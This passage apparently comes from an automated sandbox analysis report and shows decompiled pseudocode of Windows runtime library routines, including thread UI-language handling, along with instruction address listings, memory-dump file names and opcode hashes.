																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L048C8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E048F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                            0x048cd5f2
                                                            0x048cd5f5
                                                            0x048cd5f5
                                                            0x048cd5fd
                                                            0x048cd600
                                                            0x048cd60a
                                                            0x048cd60d
                                                            0x048cd617
                                                            0x048cd61d
                                                            0x048cd627
                                                            0x048cd62e
                                                            0x048cd911
                                                            0x048cd913
                                                            0x00000000
                                                            0x048cd919
                                                            0x048cd919
                                                            0x048cd919
                                                            0x048cd634
                                                            0x048cd634
                                                            0x048cd634
                                                            0x048cd634
                                                            0x048cd640
                                                            0x048cd8bf
                                                            0x00000000
                                                            0x048cd646
                                                            0x048cd646
                                                            0x048cd64d
                                                            0x048cd652
                                                            0x0491b2fc
                                                            0x0491b2fc
                                                            0x0491b302
                                                            0x0491b33b
                                                            0x0491b341
                                                            0x00000000
                                                            0x0491b304
                                                            0x0491b304
                                                            0x0491b319
                                                            0x0491b31e
                                                            0x0491b324
                                                            0x0491b326
                                                            0x0491b332
                                                            0x0491b347
                                                            0x0491b34c
                                                            0x0491b351
                                                            0x0491b35a
                                                            0x00000000
                                                            0x0491b328
                                                            0x0491b328
                                                            0x00000000
                                                            0x0491b328
                                                            0x0491b326
                                                            0x048cd658
                                                            0x048cd658
                                                            0x048cd65b
                                                            0x048cd665
                                                            0x00000000
                                                            0x048cd66b
                                                            0x048cd66b
                                                            0x048cd66b
                                                            0x048cd66b
                                                            0x048cd66d
                                                            0x048cd672
                                                            0x048cd67a
                                                            0x00000000
                                                            0x00000000
                                                            0x048cd680
                                                            0x048cd686
                                                            0x048cd8ce
                                                            0x048cd8d4
                                                            0x048cd8da
                                                            0x048cd8dd
                                                            0x048cd8dd
                                                            0x048cd8e0
                                                            0x048cd68c
                                                            0x048cd691
                                                            0x048cd69d
                                                            0x048cd6a2
                                                            0x048cd6a7
                                                            0x048cd6b0
                                                            0x048cd6b0
                                                            0x048cd6b5
                                                            0x048cd6e0
                                                            0x048cd6b7
                                                            0x048cd6b7
                                                            0x048cd6b9
                                                            0x048cd6b9
                                                            0x048cd6bb
                                                            0x048cd6bd
                                                            0x048cd6ce
                                                            0x048cd6d0
                                                            0x048cd6d2
                                                            0x0491b363
                                                            0x0491b365
                                                            0x00000000
                                                            0x0491b36b
                                                            0x00000000
                                                            0x0491b36b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048cd6bf
                                                            0x048cd6bf
                                                            0x048cd6e5
                                                            0x048cd6e7
                                                            0x048cd6e9
                                                            0x048cd6e9
                                                            0x048cd6ec
                                                            0x048cd6ec
                                                            0x048cd6ef
                                                            0x048cd6f5
                                                            0x048cd6f9
                                                            0x048cd6fb
                                                            0x048cd6fd
                                                            0x048cd701
                                                            0x048cd703
                                                            0x048cd70a
                                                            0x048cd70a
                                                            0x048cd70a
                                                            0x048cd701
                                                            0x048cd70d
                                                            0x048cd710
                                                            0x048cd710
                                                            0x048cd6c1
                                                            0x048cd6c1
                                                            0x048cd6c1
                                                            0x048cd6c6
                                                            0x0491b36d
                                                            0x0491b36f
                                                            0x00000000
                                                            0x0491b375
                                                            0x0491b375
                                                            0x0491b375
                                                            0x00000000
                                                            0x0491b375
                                                            0x00000000
                                                            0x048cd6cc
                                                            0x048cd6d8
                                                            0x048cd6d8
                                                            0x048cd6d8
                                                            0x00000000
                                                            0x048cd6c6
                                                            0x048cd6bf
                                                            0x00000000
                                                            0x048cd6da
                                                            0x048cd6da
                                                            0x048cd716
                                                            0x048cd71b
                                                            0x048cd720
                                                            0x048cd726
                                                            0x048cd726
                                                            0x048cd72d
                                                            0x00000000
                                                            0x048cd733
                                                            0x048cd739
                                                            0x048cd742
                                                            0x048cd750
                                                            0x048cd758
                                                            0x048cd764
                                                            0x048cd776
                                                            0x048cd77a
                                                            0x048cd783
                                                            0x048cd928
                                                            0x048cd92c
                                                            0x048cd93d
                                                            0x048cd944
                                                            0x048cd94f
                                                            0x048cd954
                                                            0x048cd956
                                                            0x048cd95f
                                                            0x048cd961
                                                            0x048cd973
                                                            0x048cd973
                                                            0x048cd956
                                                            0x048cd944
                                                            0x048cd92c
                                                            0x048cd78b
                                                            0x0491b394
                                                            0x048cd791
                                                            0x048cd798
                                                            0x0491b3a3
                                                            0x0491b3bb
                                                            0x0491b3bb
                                                            0x048cd7a5
                                                            0x048cd866
                                                            0x048cd870
                                                            0x048cd884
                                                            0x048cd892
                                                            0x048cd898
                                                            0x048cd89e
                                                            0x048cd8a0
                                                            0x048cd8a6
                                                            0x048cd8ac
                                                            0x048cd8ae
                                                            0x048cd8b4
                                                            0x048cd8b4
                                                            0x048cd8ae
                                                            0x048cd7a5
                                                            0x048cd78b
                                                            0x048cd7b1
                                                            0x0491b3c5
                                                            0x0491b3c5
                                                            0x048cd7c3
                                                            0x048cd7ca
                                                            0x048cd7e5
                                                            0x048cd7eb
                                                            0x048cd8eb
                                                            0x048cd8ed
                                                            0x00000000
                                                            0x048cd8f3
                                                            0x048cd8f3
                                                            0x048cd8f3
                                                            0x00000000
                                                            0x048cd8ed
                                                            0x048cd7cc
                                                            0x048cd7cc
                                                            0x048cd7d2
                                                            0x00000000
                                                            0x048cd7d4
                                                            0x048cd7d4
                                                            0x048cd7d7
                                                            0x048cd7df
                                                            0x0491b3d4
                                                            0x0491b3d9
                                                            0x0491b3dc
                                                            0x0491b3dc
                                                            0x0491b3df
                                                            0x0491b3e2
                                                            0x0491b468
                                                            0x0491b46d
                                                            0x0491b46f
                                                            0x0491b46f
                                                            0x0491b475
                                                            0x048cd8f8
                                                            0x048cd8f9
                                                            0x048cd8fd
                                                            0x0491b3e8
                                                            0x0491b3e8
                                                            0x0491b3eb
                                                            0x0491b3ed
                                                            0x00000000
                                                            0x0491b3ef
                                                            0x0491b3ef
                                                            0x0491b3f1
                                                            0x0491b3f4
                                                            0x0491b3fe
                                                            0x0491b404
                                                            0x0491b409
                                                            0x0491b40e
                                                            0x0491b410
                                                            0x0491b410
                                                            0x0491b414
                                                            0x0491b414
                                                            0x0491b41b
                                                            0x0491b420
                                                            0x0491b423
                                                            0x0491b425
                                                            0x0491b427
                                                            0x0491b42a
                                                            0x0491b42d
                                                            0x0491b42d
                                                            0x0491b42a
                                                            0x0491b432
                                                            0x0491b436
                                                            0x0491b438
                                                            0x0491b43b
                                                            0x0491b43b
                                                            0x0491b449
                                                            0x0491b44e
                                                            0x0491b454
                                                            0x0491b458
                                                            0x0491b458
                                                            0x0491b45d
                                                            0x00000000
                                                            0x0491b45d
                                                            0x0491b3ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048cd7df
                                                            0x048cd7d2
                                                            0x048cd7ca
                                                            0x0491b37c
                                                            0x0491b37e
                                                            0x0491b385
                                                            0x0491b38a
                                                            0x00000000
                                                            0x0491b38a
                                                            0x048cd742
                                                            0x048cd7f1
                                                            0x048cd7f8
                                                            0x0491b49b
                                                            0x0491b49b
                                                            0x048cd800
                                                            0x048cd837
                                                            0x048cd843
                                                            0x048cd845
                                                            0x048cd847
                                                            0x048cd84a
                                                            0x048cd84b
                                                            0x048cd84e
                                                            0x048cd857
                                                            0x048cd802
                                                            0x048cd802
                                                            0x048cd80d
                                                            0x00000000
                                                            0x048cd818
                                                            0x048cd818
                                                            0x048cd824
                                                            0x048cd831
                                                            0x0491b4a5
                                                            0x0491b4ab
                                                            0x0491b4b3
                                                            0x0491b4b8
                                                            0x0491b4bb
                                                            0x00000000
                                                            0x0491b4c1
                                                            0x0491b4c1
                                                            0x0491b4c8
                                                            0x00000000
                                                            0x0491b4ce
                                                            0x0491b4d4
                                                            0x0491b4e1
                                                            0x0491b4e3
                                                            0x0491b4e5
                                                            0x00000000
                                                            0x0491b4eb
                                                            0x0491b4f0
                                                            0x0491b4f2
                                                            0x048cdac9
                                                            0x048cdacc
                                                            0x048cdacf
                                                            0x048cdad1
                                                            0x048cdd78
                                                            0x048cdd78
                                                            0x048cdcf2
                                                            0x00000000
                                                            0x048cdad7
                                                            0x048cdad9
                                                            0x048cdadb
                                                            0x00000000
                                                            0x00000000
                                                            0x048cdae1
                                                            0x048cdae1
                                                            0x048cdae4
                                                            0x048cdae6
                                                            0x0491b4f9
                                                            0x0491b4f9
                                                            0x0491b500
                                                            0x048cdaec
                                                            0x048cdaec
                                                            0x048cdaf5
                                                            0x048cdaf8
                                                            0x048cdafb
                                                            0x048cdb03
                                                            0x048cdb11
                                                            0x048cdb16
                                                            0x048cdb19
                                                            0x048cdb1b
                                                            0x0491b52c
                                                            0x0491b531
                                                            0x0491b534
                                                            0x048cdb21
                                                            0x048cdb21
                                                            0x048cdb24
                                                            0x048cdcd9
                                                            0x048cdce2
                                                            0x048cdce5
                                                            0x048cdd6a
                                                            0x048cdd6d
                                                            0x00000000
                                                            0x048cdd73
                                                            0x0491b51a
                                                            0x0491b51c
                                                            0x0491b51f
                                                            0x0491b524
                                                            0x00000000
                                                            0x0491b524
                                                            0x048cdce7
                                                            0x048cdce7
                                                            0x048cdce7
                                                            0x00000000
                                                            0x048cdce7
                                                            0x00000000
                                                            0x048cdb2a
                                                            0x048cdb2c
                                                            0x048cdb31
                                                            0x048cdb33
                                                            0x048cdb36
                                                            0x048cdb39
                                                            0x048cdb3b
                                                            0x048cdb66
                                                            0x048cdb66
                                                            0x048cdb3d
                                                            0x048cdb3d
                                                            0x048cdb3e
                                                            0x048cdb46
                                                            0x048cdb47
                                                            0x048cdb49
                                                            0x048cdb4c
                                                            0x048cdb53
                                                            0x048cdb55
                                                            0x048cdb58
                                                            0x048cdb5a
                                                            0x0491b50a
                                                            0x0491b50f
                                                            0x0491b512
                                                            0x048cdb60
                                                            0x048cdb60
                                                            0x048cdb63
                                                            0x048cdb63
                                                            0x00000000
                                                            0x048cdb63
                                                            0x048cdb5a
                                                            0x048cdb3b
                                                            0x048cdb24
                                                            0x048cdb69
                                                            0x048cdb69
                                                            0x048cdb6c
                                                            0x048cdb6f
                                                            0x048cdb74
                                                            0x0491b557
                                                            0x0491b557
                                                            0x0491b55e
                                                            0x048cdb7a
                                                            0x048cdb7c
                                                            0x048cdb7f
                                                            0x048cdb82
                                                            0x048cdb85
                                                            0x00000000
                                                            0x048cdb8b
                                                            0x048cdb8b
                                                            0x048cdb8d
                                                            0x048cdb9b
                                                            0x048cdb9b
                                                            0x048cdb9d
                                                            0x048cdba0
                                                            0x048cdba2
                                                            0x048cdba4
                                                            0x048cdba7
                                                            0x048cdba9
                                                            0x048cdbae
                                                            0x048cdbae
                                                            0x048cdbb1
                                                            0x048cdbb4
                                                            0x048cdbb4
                                                            0x048cdbb7
                                                            0x048cdbba
                                                            0x048cdcd2
                                                            0x048cdcd4
                                                            0x00000000
                                                            0x048cdbc0
                                                            0x048cdbc0
                                                            0x048cdbd2
                                                            0x048cdbd7
                                                            0x048cdbda
                                                            0x048cdbdd
                                                            0x048cdbdf
                                                            0x00000000
                                                            0x048cdbe5
                                                            0x048cdbe5
                                                            0x048cdbee
                                                            0x048cdbf1
                                                            0x0491b541
                                                            0x0491b544
                                                            0x00000000
                                                            0x0491b546
                                                            0x0491b546
                                                            0x00000000
                                                            0x0491b546
                                                            0x048cdbf7
                                                            0x048cdbf7
                                                            0x048cdbfd
                                                            0x048cdbfd
                                                            0x048cdbff
                                                            0x048cdc0b
                                                            0x048cdc15
                                                            0x048cdc1b
                                                            0x048cdc1d
                                                            0x048cdc21
                                                            0x048cdc21
                                                            0x048cdc23
                                                            0x048cdc23
                                                            0x048cdc26
                                                            0x048cdc29
                                                            0x048cdc2b
                                                            0x00000000
                                                            0x00000000
                                                            0x048cdc31
                                                            0x048cdc34
                                                            0x048cdc36
                                                            0x048cdcbf
                                                            0x048cdcbf
                                                            0x048cdcc2
                                                            0x00000000
                                                            0x048cdc3c
                                                            0x048cdc41
                                                            0x048cdc43
                                                            0x00000000
                                                            0x048cdc45
                                                            0x048cdc45
                                                            0x048cdc47
                                                            0x00000000
                                                            0x048cdc4d
                                                            0x048cdc4d
                                                            0x048cdc50
                                                            0x048cdc52
                                                            0x048cdc55
                                                            0x048cdcfa
                                                            0x048cdcfe
                                                            0x048cdd08
                                                            0x048cdd0a
                                                            0x048cdd0c
                                                            0x00000000
                                                            0x048cdd12
                                                            0x048cdd15
                                                            0x048cdd2d
                                                            0x048cdd2f
                                                            0x048cdd32
                                                            0x048cdd35
                                                            0x00000000
                                                            0x048cdd35
                                                            0x048cdc5b
                                                            0x048cdc5b
                                                            0x048cdc5e
                                                            0x048cdc61
                                                            0x048cdc64
                                                            0x048cdc67
                                                            0x048cdc67
                                                            0x048cdc6a
                                                            0x048cdc6c
                                                            0x048cdc8e
                                                            0x048cdc8e
                                                            0x048cdc91
                                                            0x048cdc93
                                                            0x048cdcce
                                                            0x048cdcce
                                                            0x048cdc95
                                                            0x048cdc9c
                                                            0x048cdc6e
                                                            0x048cdc72
                                                            0x048cdc75
                                                            0x048cdc77
                                                            0x048cdc79
                                                            0x0491b551
                                                            0x0491b551
                                                            0x00000000
                                                            0x048cdc7f
                                                            0x048cdc7f
                                                            0x048cdc81
                                                            0x00000000
                                                            0x048cdc83
                                                            0x048cdc86
                                                            0x048cdc88
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048cdc88
                                                            0x048cdc81
                                                            0x048cdc79
                                                            0x048cdc6c
                                                            0x048cdc55
                                                            0x048cdc47
                                                            0x048cdc43
                                                            0x00000000
                                                            0x048cdc36
                                                            0x048cdc23
                                                            0x00000000
                                                            0x048cdbff
                                                            0x048cdbf1
                                                            0x048cdbdf
                                                            0x048cdb8f
                                                            0x048cdb92
                                                            0x048cdb95
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048cdb95
                                                            0x048cdb8d
                                                            0x048cdb85
                                                            0x048cdb74
                                                            0x048cdc9f
                                                            0x048cdca2
                                                            0x048cdcb0
                                                            0x048cdcb0
                                                            0x048cdad1
                                                            0x0491b4e5
                                                            0x0491b4c8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048cd831
                                                            0x048cd80d
                                                            0x00000000
                                                            0x048cd800
                                                            0x0491b47f
                                                            0x0491b485
                                                            0x00000000
                                                            0x0491b485
                                                            0x048cd665
                                                            0x048cd652
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x-7
                                                            • API String ID: 0-1026826010
                                                            • Opcode ID: 85adfb24a51278c4ad2c2c25f1b6b939605a87c0150f373ead7f3ad4053a4937
                                                            • Instruction ID: 24aa9cd58dffa1210a643059d663ea7ceb9859ecee48018264540a8cd8af6b25
                                                            • Opcode Fuzzy Hash: 85adfb24a51278c4ad2c2c25f1b6b939605a87c0150f373ead7f3ad4053a4937
                                                            • Instruction Fuzzy Hash: 43E1A031A052598FEB24EF28C880B69B7F6BF85308F044ABDD90997290D774FD95CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E048EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E048CEEF0(0x49a7b60);
					_t134 =  *0x49a7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x49a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x49a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E048C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E048C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04958938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E048BB150();
													}
													_t116 = E04956D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E048C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x49a8638; // 0x381ed8
																	_t122 = L048C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E048C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E048C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L048EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L048C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E048EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E048EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E048EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E048EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E048EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x49a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x49a7b84 = _t75;
						_t73 = E048CEB70(_t134, 0x49a7b60);
						if( *0x49a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E048CFF60( *0x49a7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                            0x048efab0
                                                            0x048efab2
                                                            0x048efab3
                                                            0x048efab4
                                                            0x048efabc
                                                            0x048efac0
                                                            0x048efb14
                                                            0x048efb17
                                                            0x048efac2
                                                            0x048efac8
                                                            0x048efacd
                                                            0x048efad3
                                                            0x048efad3
                                                            0x048efadd
                                                            0x048efb18
                                                            0x048efb1b
                                                            0x048efb1d
                                                            0x048efb1e
                                                            0x048efb1f
                                                            0x048efb20
                                                            0x048efb21
                                                            0x048efb22
                                                            0x048efb23
                                                            0x048efb24
                                                            0x048efb25
                                                            0x048efb26
                                                            0x048efb27
                                                            0x048efb28
                                                            0x048efb29
                                                            0x048efb2a
                                                            0x048efb2b
                                                            0x048efb2c
                                                            0x048efb2d
                                                            0x048efb2e
                                                            0x048efb2f
                                                            0x048efb3a
                                                            0x048efb3b
                                                            0x048efb3e
                                                            0x048efb41
                                                            0x048efb44
                                                            0x048efb47
                                                            0x048efb4a
                                                            0x048efb4d
                                                            0x048efb53
                                                            0x0492bdcb
                                                            0x0492bdcb
                                                            0x048efb59
                                                            0x048efb5b
                                                            0x048efb5b
                                                            0x048efb5e
                                                            0x0492bdd5
                                                            0x0492bdd8
                                                            0x00000000
                                                            0x0492bdda
                                                            0x00000000
                                                            0x0492bdda
                                                            0x048efb64
                                                            0x048efb64
                                                            0x048efb64
                                                            0x048efb67
                                                            0x048efb6e
                                                            0x048efb70
                                                            0x048efb72
                                                            0x00000000
                                                            0x048efb78
                                                            0x048efb7a
                                                            0x048efb7a
                                                            0x048efb7d
                                                            0x048efb80
                                                            0x0492bddf
                                                            0x0492bde1
                                                            0x00000000
                                                            0x0492bde3
                                                            0x00000000
                                                            0x0492bde3
                                                            0x048efb86
                                                            0x048efb86
                                                            0x048efb86
                                                            0x048efb8b
                                                            0x048efb90
                                                            0x048efb92
                                                            0x048efb94
                                                            0x048efb9a
                                                            0x048efb9b
                                                            0x048efba1
                                                            0x0492bde8
                                                            0x0492bdeb
                                                            0x0492bded
                                                            0x0492beb5
                                                            0x0492beb5
                                                            0x0492bebb
                                                            0x0492bebd
                                                            0x0492bec3
                                                            0x0492bed2
                                                            0x0492bedd
                                                            0x0492bedd
                                                            0x0492beed
                                                            0x00000000
                                                            0x0492bdf3
                                                            0x0492bdfe
                                                            0x0492be06
                                                            0x0492be0b
                                                            0x0492be0d
                                                            0x0492be0f
                                                            0x0492be14
                                                            0x0492be19
                                                            0x0492be20
                                                            0x0492be25
                                                            0x0492be27
